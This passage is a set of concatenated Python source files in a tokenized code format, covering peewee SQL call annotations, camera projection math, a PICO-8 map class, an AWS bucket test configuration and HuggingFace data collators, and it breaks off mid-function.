<import_stmt>peewee<import_stmt>playhouse.pool<line_sep># This is just one example of one of the support databases # see https://docs.peewee-orm.com/en/latest/peewee/database.html db=peewee.MySQLDatabase()<line_sep>conn=db.connection()<line_sep>cursor=conn.cursor()<line_sep>cursor.execute("sql")# $ getSql="sql" cursor=db.cursor()<line_sep>cursor.execute("sql")# $ getSql="sql" db.execute_sql("sql")# $ getSql="sql" # Pool extension pool=playhouse.pool.PooledMySQLDatabase(<ellipsis>)<line_sep>pool.execute_sql("sql")# $ getSql="sql"
# -*- coding: utf-8 -*- # Max-Planck-Gesellschaft zur Förderung der Wissenschaften e.V. (MPG) is # holder of all proprietary rights on this computer program. # You can only use this computer program if you have closed # a license agreement with MPG or you get the right to use the computer # program from someone who is authorized to grant you that right. # Any use of the computer program without a valid license is prohibited and # liable to prosecution. # # Copyright©2019 Max-Planck-Gesellschaft zur Förderung # der Wissenschaften e.V. (MPG). acting on behalf of its Max Planck Institute # for Intelligent Systems. All rights reserved. # # Contact: <EMAIL> <import_stmt>cv2<import_stmt>numpy<as>np<import_from_stmt>.glm ortho<class_stmt>Camera<block_start><def_stmt>__init__ self width=1600 height=1200# Focal Length # equivalent 50mm <block_start>focal=np.sqrt(width<times>width+height<times>height)<line_sep>self.focal_x=focal<line_sep>self.focal_y=focal<line_sep># Principal Point Offset self.principal_x=width/2<line_sep>self.principal_y=height/2<line_sep># Axis Skew self.skew=0<line_sep># Image Size self.width=width<line_sep>self.height=height<line_sep>self.near=1<line_sep>self.far=10<line_sep># Camera Center self.center=np.array([0 0 1.6])<line_sep>self.direction=np.array([0 0 -1])<line_sep>self.right=np.array([1 0 0])<line_sep>self.up=np.array([0 1 0])<line_sep>self.ortho_ratio=<none><block_end><def_stmt>sanity_check self<block_start>self.center=self.center.reshape([-1])<line_sep>self.direction=self.direction.reshape([-1])<line_sep>self.right=self.right.reshape([-1])<line_sep>self.up=self.up.reshape([-1])<assert_stmt>len(self.center)<eq>3<assert_stmt>len(self.direction)<eq>3<assert_stmt>len(self.right)<eq>3<assert_stmt>len(self.up)<eq>3<block_end>@staticmethod<def_stmt>normalize_vector v<block_start>v_norm=np.linalg.norm(v)<line_sep><return>v<if>v_norm<eq>0<else>v/v_norm<block_end><def_stmt>get_real_z_value self 
z<block_start>z_near=self.near<line_sep>z_far=self.far<line_sep>z_n=2.0<times>z-1.0<line_sep>z_e=2.0<times>z_near<times>z_far/(z_far+z_near-z_n<times>(z_far-z_near))<line_sep><return>z_e<block_end><def_stmt>get_rotation_matrix self<block_start>rot_mat=np.eye(3)<line_sep>s=self.right<line_sep>s=self.normalize_vector(s)<line_sep>rot_mat[0 :]=s<line_sep>u=self.up<line_sep>u=self.normalize_vector(u)<line_sep>rot_mat[1 :]=-u<line_sep>rot_mat[2 :]=self.normalize_vector(self.direction)<line_sep><return>rot_mat<block_end><def_stmt>get_translation_vector self<block_start>rot_mat=self.get_rotation_matrix()<line_sep>trans=-np.dot(rot_mat self.center)<line_sep><return>trans<block_end><def_stmt>get_intrinsic_matrix self<block_start>int_mat=np.eye(3)<line_sep>int_mat[0 0]=self.focal_x<line_sep>int_mat[1 1]=self.focal_y<line_sep>int_mat[0 1]=self.skew<line_sep>int_mat[0 2]=self.principal_x<line_sep>int_mat[1 2]=self.principal_y<line_sep><return>int_mat<block_end><def_stmt>get_projection_matrix self<block_start>ext_mat=self.get_extrinsic_matrix()<line_sep>int_mat=self.get_intrinsic_matrix()<line_sep><return>np.matmul(int_mat ext_mat)<block_end><def_stmt>get_extrinsic_matrix self<block_start>rot_mat=self.get_rotation_matrix()<line_sep>int_mat=self.get_intrinsic_matrix()<line_sep>trans=self.get_translation_vector()<line_sep>extrinsic=np.eye(4)<line_sep>extrinsic[:3 :3]=rot_mat<line_sep>extrinsic[:3 3]=trans<line_sep><return>extrinsic[:3 :]<block_end><def_stmt>set_rotation_matrix self rot_mat<block_start>self.direction=rot_mat[2 :]<line_sep>self.up=-rot_mat[1 :]<line_sep>self.right=rot_mat[0 :]<block_end><def_stmt>set_intrinsic_matrix self int_mat<block_start>self.focal_x=int_mat[0 0]<line_sep>self.focal_y=int_mat[1 1]<line_sep>self.skew=int_mat[0 1]<line_sep>self.principal_x=int_mat[0 2]<line_sep>self.principal_y=int_mat[1 2]<block_end><def_stmt>set_projection_matrix self 
proj_mat<block_start>res=cv2.decomposeProjectionMatrix(proj_mat)<line_sep>int_mat,rot_mat,camera_center_homo=res[0] res[1] res[2]<line_sep>camera_center=camera_center_homo[0:3]/camera_center_homo[3]<line_sep>camera_center=camera_center.reshape(-1)<line_sep>int_mat=int_mat/int_mat[2][2]<line_sep>self.set_intrinsic_matrix(int_mat)<line_sep>self.set_rotation_matrix(rot_mat)<line_sep>self.center=camera_center<line_sep>self.sanity_check()<block_end><def_stmt>get_gl_matrix self<block_start>z_near=self.near<line_sep>z_far=self.far<line_sep>rot_mat=self.get_rotation_matrix()<line_sep>int_mat=self.get_intrinsic_matrix()<line_sep>trans=self.get_translation_vector()<line_sep>extrinsic=np.eye(4)<line_sep>extrinsic[:3 :3]=rot_mat<line_sep>extrinsic[:3 3]=trans<line_sep>axis_adj=np.eye(4)<line_sep>axis_adj[2 2]=-1<line_sep>axis_adj[1 1]=-1<line_sep>model_view=np.matmul(axis_adj extrinsic)<line_sep>projective=np.zeros([4 4])<line_sep>projective[:2 :2]=int_mat[:2 :2]<line_sep>projective[:2 2:3]=-int_mat[:2 2:3]<line_sep>projective[3 2]=-1<line_sep>projective[2 2]=(z_near+z_far)<line_sep>projective[2 3]=(z_near<times>z_far)<if_stmt>self.ortho_ratio<is><none><block_start>ndc=ortho(0 self.width 0 self.height z_near z_far)<line_sep>perspective=np.matmul(ndc projective)<block_end><else_stmt><block_start>perspective=ortho(-self.width<times>self.ortho_ratio/2 self.width<times>self.ortho_ratio/2 -self.height<times>self.ortho_ratio/2 self.height<times>self.ortho_ratio/2 z_near z_far)<block_end><return>perspective model_view<block_end><block_end><def_stmt>KRT_from_P proj_mat normalize_K=<true><block_start>res=cv2.decomposeProjectionMatrix(proj_mat)<line_sep>K,Rot,camera_center_homog=res[0] res[1] res[2]<line_sep>camera_center=camera_center_homog[0:3]/camera_center_homog[3]<line_sep>trans=-Rot.dot(camera_center)<if_stmt>normalize_K<block_start>K=K/K[2][2]<block_end><return>K Rot trans<block_end><def_stmt>MVP_from_P proj_mat width height near=0.1 far=10000<block_start>''' Convert OpenCV 
camera calibration matrix to OpenGL projection and model view matrix :param proj_mat: OpenCV camera projeciton matrix :param width: Image width :param height: Image height :param near: Z near value :param far: Z far value :return: OpenGL projection matrix and model view matrix '''<line_sep>res=cv2.decomposeProjectionMatrix(proj_mat)<line_sep>K,Rot,camera_center_homog=res[0] res[1] res[2]<line_sep>camera_center=camera_center_homog[0:3]/camera_center_homog[3]<line_sep>trans=-Rot.dot(camera_center)<line_sep>K=K/K[2][2]<line_sep>extrinsic=np.eye(4)<line_sep>extrinsic[:3 :3]=Rot<line_sep>extrinsic[:3 3:4]=trans<line_sep>axis_adj=np.eye(4)<line_sep>axis_adj[2 2]=-1<line_sep>axis_adj[1 1]=-1<line_sep>model_view=np.matmul(axis_adj extrinsic)<line_sep>zFar=far<line_sep>zNear=near<line_sep>projective=np.zeros([4 4])<line_sep>projective[:2 :2]=K[:2 :2]<line_sep>projective[:2 2:3]=-K[:2 2:3]<line_sep>projective[3 2]=-1<line_sep>projective[2 2]=(zNear+zFar)<line_sep>projective[2 3]=(zNear<times>zFar)<line_sep>ndc=ortho(0 width 0 height zNear zFar)<line_sep>perspective=np.matmul(ndc projective)<line_sep><return>perspective model_view<block_end>
"""The map section of a PICO-8 cart. The map region consists of 4096 bytes. The .p8 representation is 32 lines of 256 hexadecimal digits (128 bytes). The map is 128 tiles wide by 64 tiles high. Each tile is one of the 256 tiles from the spritesheet. Map memory describes the top 32 rows (128 * 32 = 4096). If the developer draws tiles in the bottom 32 rows, this is stored in the bottom of the gfx memory region. """<line_sep>__all__=['Map']<import_from_stmt>.. util<class_stmt>Map(util.BaseSection)<block_start>"""The map region of a PICO-8 cart."""<line_sep>HEX_LINE_LENGTH_BYTES=128<def_stmt>__init__ self *args **kwargs<block_start>"""The initializer. The Map initializer takes an optional gfx keyword argument whose value is a reference to the Gfx instance where lower map data is stored. """<line_sep>self._gfx=<none><if_stmt>'gfx'<in>kwargs<block_start>self._gfx=kwargs['gfx']<del_stmt>kwargs['gfx']<block_end>super().__init__(*args **kwargs)<block_end>@classmethod<def_stmt>empty cls version=4 gfx=<none><block_start>"""Creates an empty instance. Args: version: The PICO-8 file version. gfx: The Gfx object where lower map data is written. Returns: A Map instance. """<line_sep><return>cls(data=bytearray(b'\x00'<times>4096) version=version gfx=gfx)<block_end>@classmethod<def_stmt>from_lines cls *args **kwargs<block_start>gfx=<none><if_stmt>'gfx'<in>kwargs<block_start>gfx=kwargs['gfx']<del_stmt>kwargs['gfx']<block_end>result=super().from_lines(*args **kwargs)<line_sep>result._gfx=gfx<line_sep><return>result<block_end>@classmethod<def_stmt>from_bytes cls *args **kwargs<block_start>gfx=<none><if_stmt>'gfx'<in>kwargs<block_start>gfx=kwargs['gfx']<del_stmt>kwargs['gfx']<block_end>result=super().from_bytes(*args **kwargs)<line_sep>result._gfx=gfx<line_sep><return>result<block_end><def_stmt>get_cell self x y<block_start>"""Gets the tile ID for a map cell. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. Map must have a Gfx if y > 31. 
(0-63) Returns: The tile ID for the cell. """<assert_stmt>0<le>x<le>127<assert_stmt>(0<le>y<le>31)<or>((0<le>y<le>63)<and>self._gfx<is><not><none>)<if_stmt>y<le>31<block_start><return>self._data[y<times>128+x]<block_end><return>self._gfx._data[4096+(y-32)<times>128+x]<block_end><def_stmt>set_cell self x y val<block_start>"""Sets the tile ID for a map cell. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. (0-63) If y > 31, Map must have a Gfx, and this method updates the shared data region in the Gfx. val: The new tile ID for the cell. (0-255) """<assert_stmt>0<le>x<le>127<assert_stmt>(0<le>y<le>31)<or>((0<le>y<le>63)<and>self._gfx<is><not><none>)<assert_stmt>0<le>val<le>255<if_stmt>y<le>31<block_start>self._data[y<times>128+x]=val<block_end><else_stmt><block_start>self._gfx._data[4096+(y-32)<times>128+x]=val<block_end><block_end><def_stmt>get_rect_tiles self x y width=1 height=1<block_start>"""Gets a rectangle of map tiles. The map is a grid of 128x32 tiles, or 128x64 if using the gfx/map shared memory for map data. This method returns a rectangle of tile IDs on the map, as a list of bytearrays. If the requested rectangle size goes off the edge of the map, the off-edge tiles are returned as 0. The bottom edge is always assumed to be beyond the 64th row in the gfx/map shared memory region. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map must have a Gfx. width: The width of the rectangle, as a number of tiles. height: The height of the rectangle, as a number of tiles. Returns: The rectangle of tile IDs, as a list of bytearrays. 
"""<assert_stmt>0<le>x<le>127<assert_stmt>1<le>width<assert_stmt>1<le>height<assert_stmt>((0<le>y+height<le>32)<or>((0<le>y+height<le>64)<and>self._gfx<is><not><none>))<line_sep>result=[]<for_stmt>tile_y range(y y+height)<block_start>row=bytearray()<for_stmt>tile_x range(x x+width)<block_start><if_stmt>(tile_y<g>63)<or>(tile_x<g>127)<block_start>row.append(0)<block_end><else_stmt><block_start>row.append(self.get_cell(tile_x tile_y))<block_end><block_end>result.append(row)<block_end><return>result<block_end><def_stmt>set_rect_tiles self rect x y<block_start>"""Writes a rectangle of tiles to the map. If writing the given rectangle at the given coordinates causes the rectangle to extend off the edge of the map, the remainer is discarded. Args: rect: A rectangle of tile IDs, as an iterable of iterables of IDs. x: The map tile x coordinate (column) of the upper left corner to start writing. y: The map tile y coordinate (row) of the upper left corner to start writing. """<for_stmt>tile_y,row enumerate(rect)<block_start><for_stmt>tile_x,val enumerate(row)<block_start><if_stmt>((tile_y+y)<g>127)<or>((tile_x+x)<g>127)<block_start><continue><block_end>self.set_cell(tile_x+x tile_y+y val)<block_end><block_end><block_end><def_stmt>get_rect_pixels self x y width=1 height=1<block_start>"""Gets a rectangel of map tiles as pixels. This is similar to get_rect_tiles() except the tiles are extracted from Gfx data and returned as a rectangle of pixels. Just like PICO-8, tile ID 0 is rendered as empty (all 0's), not the actual tile at ID 0. Args: x: The map cell x (column) coordinate. (0-127) y: The map cell y (row) coordinate. (0-63) If y + height > 31, Map must have a Gfx. width: The width of the rectangle, as a number of tiles. height: The height of the rectangle, as a number of tiles. Returns: The rectangle of pixels, as a list of bytearrays of pixel colors. 
"""<assert_stmt>self._gfx<is><not><none><assert_stmt>0<le>x<le>127<assert_stmt>1<le>width<assert_stmt>1<le>height<assert_stmt>0<le>y+height<le>64<line_sep>tile_rect=self.get_rect_tiles(x y width height)<line_sep>result=[]<for_stmt>tile_row tile_rect<block_start>pixel_row=[bytearray() bytearray() bytearray() bytearray() bytearray() bytearray() bytearray() bytearray()]<for_stmt>id tile_row<block_start><if_stmt>id<eq>0<block_start>sprite=[bytearray(b'\x00'<times>8)]<times>8<block_end><else_stmt><block_start>sprite=self._gfx.get_sprite(id)<block_end><for_stmt>i range(0 8)<block_start>pixel_row[i].extend(sprite[i])<block_end><block_end><for_stmt>i range(0 8)<block_start>result.append(pixel_row[i])<block_end><block_end><return>result<block_end><block_end>
<import_from_stmt>uuid uuid4<line_sep># separates test runs TEST_UUID=str(uuid4())<def_stmt>_code_bucket <block_start><return>'foundations-code-test'<block_end><def_stmt>make_code_bucket <block_start><import_from_stmt>foundations PrefixedBucket<import_from_stmt>foundations_aws AWSBucket<line_sep><return>PrefixedBucket(TEST_UUID AWSBucket _code_bucket())<block_end><def_stmt>_result_bucket <block_start><return>'foundations-results-test'<block_end><def_stmt>make_result_bucket <block_start><import_from_stmt>foundations PrefixedBucket<import_from_stmt>foundations_aws AWSBucket<line_sep><return>PrefixedBucket(TEST_UUID AWSBucket _result_bucket())<block_end><def_stmt>_config <block_start><import_from_stmt>foundations config_manager<import_from_stmt>foundations PrefixedBucket BucketPipelineArchive BucketPipelineListing<import_from_stmt>foundations_aws AWSBucket<line_sep># archive implementations archive_implementation={'archive_type':BucketPipelineArchive 'constructor_arguments':[PrefixedBucket TEST_UUID AWSBucket _result_bucket()] }<line_sep>config_manager['archive_listing_implementation']={'archive_listing_type':BucketPipelineListing 'constructor_arguments':[PrefixedBucket TEST_UUID AWSBucket _result_bucket()] }<line_sep>config_manager['stage_log_archive_implementation']=archive_implementation<line_sep>config_manager['persisted_data_archive_implementation']=archive_implementation<line_sep>config_manager['provenance_archive_implementation']=archive_implementation<line_sep>config_manager['job_source_archive_implementation']=archive_implementation<line_sep>config_manager['artifact_archive_implementation']=archive_implementation<line_sep>config_manager['miscellaneous_archive_implementation']=archive_implementation<line_sep>config_manager['run_script_environment']={'enable_stages':<true>}<line_sep># quiet logs config_manager['log_level']='ERROR'<block_end>_config()<line_sep>
# Copyright 2020 The HuggingFace Team. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>random<import_stmt>warnings<import_from_stmt>collections.abc Mapping<import_from_stmt>dataclasses dataclass<import_from_stmt>typing Any Callable Dict List NewType Optional Tuple Union<import_from_stmt>..models.bert BertTokenizer BertTokenizerFast<import_from_stmt>..tokenization_utils_base PreTrainedTokenizerBase<import_from_stmt>..utils PaddingStrategy<line_sep>InputDataClass=NewType("InputDataClass" Any)<line_sep>""" A DataCollator is a function that takes a list of samples from a Dataset and collate them into a batch, as a dictionary of PyTorch/TensorFlow tensors or NumPy arrays. 
"""<line_sep>DataCollator=NewType("DataCollator" Callable[[List[InputDataClass]] Dict[str Any]])<class_stmt>DataCollatorMixin<block_start><def_stmt>__call__ self features return_tensors=<none><block_start><if_stmt>return_tensors<is><none><block_start>return_tensors=self.return_tensors<block_end><if_stmt>return_tensors<eq>"tf"<block_start><return>self.tf_call(features)<block_end><elif_stmt>return_tensors<eq>"pt"<block_start><return>self.torch_call(features)<block_end><elif_stmt>return_tensors<eq>"np"<block_start><return>self.numpy_call(features)<block_end><else_stmt><block_start><raise>ValueError(f"Framework '{return_tensors}' not recognized!")<block_end><block_end><block_end><def_stmt>default_data_collator features:List[InputDataClass] return_tensors="pt"<arrow>Dict[str Any]<block_start>""" Very simple data collator that simply collates batches of dict-like objects and performs special handling for potential keys named: - `label`: handles a single value (int or float) per object - `label_ids`: handles a list of values per object Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs to the model. See glue and ner for example of how it's useful. """<line_sep># In this function we'll make the assumption that all `features` in the batch # have the same attributes. # So we will look at the first element as a proxy for what attributes exist # on the whole batch. 
<if_stmt>return_tensors<eq>"pt"<block_start><return>torch_default_data_collator(features)<block_end><elif_stmt>return_tensors<eq>"tf"<block_start><return>tf_default_data_collator(features)<block_end><elif_stmt>return_tensors<eq>"np"<block_start><return>numpy_default_data_collator(features)<block_end><block_end>@dataclass<class_stmt>DefaultDataCollator(DataCollatorMixin)<block_start>""" Very simple data collator that simply collates batches of dict-like objects and performs special handling for potential keys named: - `label`: handles a single value (int or float) per object - `label_ids`: handles a list of values per object Does not do any additional preprocessing: property names of the input object will be used as corresponding inputs to the model. See glue and ner for example of how it's useful. This is an object (like other data collators) rather than a pure function like default_data_collator. This can be helpful if you need to set a return_tensors value at initialization. Args: return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>return_tensors:str="pt"<def_stmt>__call__ self features:List[Dict[str Any]] return_tensors=<none><arrow>Dict[str Any]<block_start><if_stmt>return_tensors<is><none><block_start>return_tensors=self.return_tensors<block_end><return>default_data_collator(features return_tensors)<block_end><block_end><def_stmt>torch_default_data_collator features:List[InputDataClass]<arrow>Dict[str Any]<block_start><import_stmt>torch<if_stmt><not>isinstance(features[0] Mapping)<block_start>features=[vars(f)<for>f features]<block_end>first=features[0]<line_sep>batch={}<line_sep># Special handling for labels. # Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) 
<if_stmt>"label"<in>first<and>first["label"]<is><not><none><block_start>label=first["label"].item()<if>isinstance(first["label"] torch.Tensor)<else>first["label"]<line_sep>dtype=torch.long<if>isinstance(label int)<else>torch.float<line_sep>batch["labels"]=torch.tensor([f["label"]<for>f features] dtype=dtype)<block_end><elif_stmt>"label_ids"<in>first<and>first["label_ids"]<is><not><none><block_start><if_stmt>isinstance(first["label_ids"] torch.Tensor)<block_start>batch["labels"]=torch.stack([f["label_ids"]<for>f features])<block_end><else_stmt><block_start>dtype=torch.long<if>type(first["label_ids"][0])<is>int<else>torch.float<line_sep>batch["labels"]=torch.tensor([f["label_ids"]<for>f features] dtype=dtype)<block_end><block_end># Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. <for_stmt>k,v first.items()<block_start><if_stmt>k<not><in>("label" "label_ids")<and>v<is><not><none><and><not>isinstance(v str)<block_start><if_stmt>isinstance(v torch.Tensor)<block_start>batch[k]=torch.stack([f[k]<for>f features])<block_end><else_stmt><block_start>batch[k]=torch.tensor([f[k]<for>f features])<block_end><block_end><block_end><return>batch<block_end><def_stmt>tf_default_data_collator features:List[InputDataClass]<arrow>Dict[str Any]<block_start><import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<if_stmt><not>isinstance(features[0] Mapping)<block_start>features=[vars(f)<for>f features]<block_end>first=features[0]<line_sep>batch={}<line_sep># Special handling for labels. # Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) 
<if_stmt>"label"<in>first<and>first["label"]<is><not><none><block_start>label_col_name="label"<block_end><elif_stmt>"label_ids"<in>first<and>first["label_ids"]<is><not><none><block_start>label_col_name="label_ids"<block_end><elif_stmt>"labels"<in>first<and>first["labels"]<is><not><none><block_start>label_col_name="labels"<block_end><else_stmt><block_start>label_col_name=<none><block_end><if_stmt>label_col_name<is><not><none><block_start><if_stmt>isinstance(first[label_col_name] tf.Tensor)<block_start>dtype=tf.int64<if>first[label_col_name].dtype.is_integer()<else>tf.float32<block_end><elif_stmt>isinstance(first[label_col_name] np.ndarray)<or>isinstance(first[label_col_name] np.generic)<block_start>dtype=tf.int64<if>np.issubdtype(first[label_col_name].dtype np.integer)<else>tf.float32<block_end><elif_stmt>isinstance(first[label_col_name] (tuple list))<block_start>dtype=tf.int64<if>isinstance(first[label_col_name][0] int)<else>tf.float32<block_end><else_stmt><block_start>dtype=tf.int64<if>isinstance(first[label_col_name] int)<else>tf.float32<block_end>batch["labels"]=tf.convert_to_tensor([f[label_col_name]<for>f features] dtype=dtype)<block_end># Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. <for_stmt>k,v first.items()<block_start><if_stmt>k<not><in>("label" "label_ids" "labels")<and>v<is><not><none><and><not>isinstance(v str)<block_start><if_stmt>isinstance(v (tf.Tensor np.ndarray))<block_start>batch[k]=tf.stack([f[k]<for>f features])<block_end><else_stmt><block_start>batch[k]=tf.convert_to_tensor([f[k]<for>f features])<block_end><block_end><block_end><return>batch<block_end><def_stmt>numpy_default_data_collator features:List[InputDataClass]<arrow>Dict[str Any]<block_start><import_stmt>numpy<as>np<if_stmt><not>isinstance(features[0] Mapping)<block_start>features=[vars(f)<for>f features]<block_end>first=features[0]<line_sep>batch={}<line_sep># Special handling for labels. 
# Ensure that tensor is created with the correct type # (it should be automatically the case, but let's make sure of it.) <if_stmt>"label"<in>first<and>first["label"]<is><not><none><block_start>label=first["label"].item()<if>isinstance(first["label"] np.ndarray)<else>first["label"]<line_sep>dtype=np.int64<if>isinstance(label int)<else>np.float32<line_sep>batch["labels"]=np.array([f["label"]<for>f features] dtype=dtype)<block_end><elif_stmt>"label_ids"<in>first<and>first["label_ids"]<is><not><none><block_start><if_stmt>isinstance(first["label_ids"] np.ndarray)<block_start>batch["labels"]=np.stack([f["label_ids"]<for>f features])<block_end><else_stmt><block_start>dtype=np.int64<if>type(first["label_ids"][0])<is>int<else>np.float32<line_sep>batch["labels"]=np.array([f["label_ids"]<for>f features] dtype=dtype)<block_end><block_end># Handling of all other possible keys. # Again, we will use the first element to figure out which key/values are not None for this model. <for_stmt>k,v first.items()<block_start><if_stmt>k<not><in>("label" "label_ids")<and>v<is><not><none><and><not>isinstance(v str)<block_start><if_stmt>isinstance(v np.ndarray)<block_start>batch[k]=np.stack([f[k]<for>f features])<block_end><else_stmt><block_start>batch[k]=np.array([f[k]<for>f features])<block_end><block_end><block_end><return>batch<block_end>@dataclass<class_stmt>DataCollatorWithPadding<block_start>""" Data collator that will dynamically pad the inputs received. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`): Select a strategy to pad the returned sequences (according to the model's padding side and padding index) among: - `True` or `'longest'` (default): Pad to the longest sequence in the batch (or no padding if only a single sequence is provided). 
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum acceptable input length for the model if that argument is not provided. - `False` or `'do_not_pad'`: No padding (i.e., can output a batch with sequences of different lengths). max_length (`int`, *optional*): Maximum length of the returned list and optionally padding length (see above). pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta). return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>padding:Union[bool str PaddingStrategy]=<true><line_sep>max_length:Optional[int]=<none><line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>return_tensors:str="pt"<def_stmt>__call__ self features:List[Dict[str Any]]<arrow>Dict[str Any]<block_start>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of return_tensors=self.return_tensors )<if_stmt>"label"<in>batch<block_start>batch["labels"]=batch["label"]<del_stmt>batch["label"]<block_end><if_stmt>"label_ids"<in>batch<block_start>batch["labels"]=batch["label_ids"]<del_stmt>batch["label_ids"]<block_end><return>batch<block_end><block_end>@dataclass<class_stmt>DataCollatorForTokenClassification(DataCollatorMixin)<block_start>""" Data collator that will dynamically pad the inputs received, as well as the labels. Args: tokenizer ([`PreTrainedTokenizer`] or [`PreTrainedTokenizerFast`]): The tokenizer used for encoding the data. 
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `True`): Select a strategy to pad the returned sequences (according to the model's padding side and padding index) among: - `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single sequence is provided). - `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum acceptable input length for the model if that argument is not provided. - `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different lengths). max_length (`int`, *optional*): Maximum length of the returned list and optionally padding length (see above). pad_to_multiple_of (`int`, *optional*): If set will pad the sequence to a multiple of the provided value. This is especially useful to enable the use of Tensor Cores on NVIDIA hardware with compute capability >= 7.5 (Volta). label_pad_token_id (`int`, *optional*, defaults to -100): The id to use when padding the labels (-100 will be automatically ignore by PyTorch loss functions). return_tensors (`str`): The type of Tensor to return. Allowable values are "np", "pt" and "tf". """<line_sep>tokenizer:PreTrainedTokenizerBase<line_sep>padding:Union[bool str PaddingStrategy]=<true><line_sep>max_length:Optional[int]=<none><line_sep>pad_to_multiple_of:Optional[int]=<none><line_sep>label_pad_token_id:int=-100<line_sep>return_tensors:str="pt"<def_stmt>torch_call self features<block_start><import_stmt>torch<line_sep>label_name="label"<if>"label"<in>features[0].keys()<else>"labels"<line_sep>labels=[feature[label_name]<for>feature features]<if>label_name<in>features[0].keys()<else><none><line_sep>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of # Conversion to tensors will fail if we have labels as they are not of the same length yet. 
return_tensors="pt"<if>labels<is><none><else><none> )<if_stmt>labels<is><none><block_start><return>batch<block_end>sequence_length=torch.tensor(batch["input_ids"]).shape[1]<line_sep>padding_side=self.tokenizer.padding_side<if_stmt>padding_side<eq>"right"<block_start>batch[label_name]=[list(label)+[self.label_pad_token_id]<times>(sequence_length-len(label))<for>label labels]<block_end><else_stmt><block_start>batch[label_name]=[[self.label_pad_token_id]<times>(sequence_length-len(label))+list(label)<for>label labels]<block_end>batch={k:torch.tensor(v dtype=torch.int64)<for>k,v batch.items()}<line_sep><return>batch<block_end><def_stmt>tf_call self features<block_start><import_stmt>tensorflow<as>tf<line_sep>label_name="label"<if>"label"<in>features[0].keys()<else>"labels"<line_sep>labels=[feature[label_name]<for>feature features]<if>label_name<in>features[0].keys()<else><none><line_sep>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of # Conversion to tensors will fail if we have labels as they are not of the same length yet. 
return_tensors="tf"<if>labels<is><none><else><none> )<if_stmt>labels<is><none><block_start><return>batch<block_end>sequence_length=tf.convert_to_tensor(batch["input_ids"]).shape[1]<line_sep>padding_side=self.tokenizer.padding_side<if_stmt>padding_side<eq>"right"<block_start>batch["labels"]=[list(label)+[self.label_pad_token_id]<times>(sequence_length-len(label))<for>label labels]<block_end><else_stmt><block_start>batch["labels"]=[[self.label_pad_token_id]<times>(sequence_length-len(label))+list(label)<for>label labels]<block_end>batch={k:tf.convert_to_tensor(v dtype=tf.int64)<for>k,v batch.items()}<line_sep><return>batch<block_end><def_stmt>numpy_call self features<block_start><import_stmt>numpy<as>np<line_sep>label_name="label"<if>"label"<in>features[0].keys()<else>"labels"<line_sep>labels=[feature[label_name]<for>feature features]<if>label_name<in>features[0].keys()<else><none><line_sep>batch=self.tokenizer.pad(features padding=self.padding max_length=self.max_length pad_to_multiple_of=self.pad_to_multiple_of # Conversion to tensors will fail if we have labels as they are not of the same length yet. 
return_tensors="np"<if>labels<is><none><else><none> )<if_stmt>labels<is><none><block_start><return>batch<block_end>sequence_length=np.array(batch["input_ids"]).shape[1]<line_sep>padding_side=self.tokenizer.padding_side<if_stmt>padding_side<eq>"right"<block_start>batch["labels"]=[list(label)+[self.label_pad_token_id]<times>(sequence_length-len(label))<for>label labels]<block_end><else_stmt><block_start>batch["labels"]=[[self.label_pad_token_id]<times>(sequence_length-len(label))+list(label)<for>label labels]<block_end>batch={k:np.array(v dtype=np.int64)<for>k,v batch.items()}<line_sep><return>batch<block_end><block_end># Stack/pad a list of examples into one torch LongTensor batch; pads with tokenizer.pad_token_id. <def_stmt>_torch_collate_batch examples tokenizer pad_to_multiple_of:Optional[int]=<none><block_start>"""Collate `examples` into a batch, using the information in `tokenizer` for padding if necessary."""<import_stmt>numpy<as>np<import_stmt>torch<line_sep># Tensorize if necessary. <if_stmt>isinstance(examples[0] (list tuple np.ndarray))<block_start>examples=[torch.tensor(e dtype=torch.long)<for>e examples]<block_end>length_of_first=examples[0].size(0)<line_sep># Check if padding is necessary. are_tensors_same_length=all(x.size(0)<eq>length_of_first<for>x examples)<if_stmt>are_tensors_same_length<and>(pad_to_multiple_of<is><none><or>length_of_first%pad_to_multiple_of<eq>0)<block_start><return>torch.stack(examples dim=0)<block_end># If yes, check if we have a `pad_token`. <if_stmt>tokenizer._pad_token<is><none><block_start><raise>ValueError("You are attempting to pad samples but the tokenizer you are using"<concat>f" ({tokenizer.__class__.__name__}) does not have a pad token.")<block_end># Creating the full tensor and filling it with our data. 
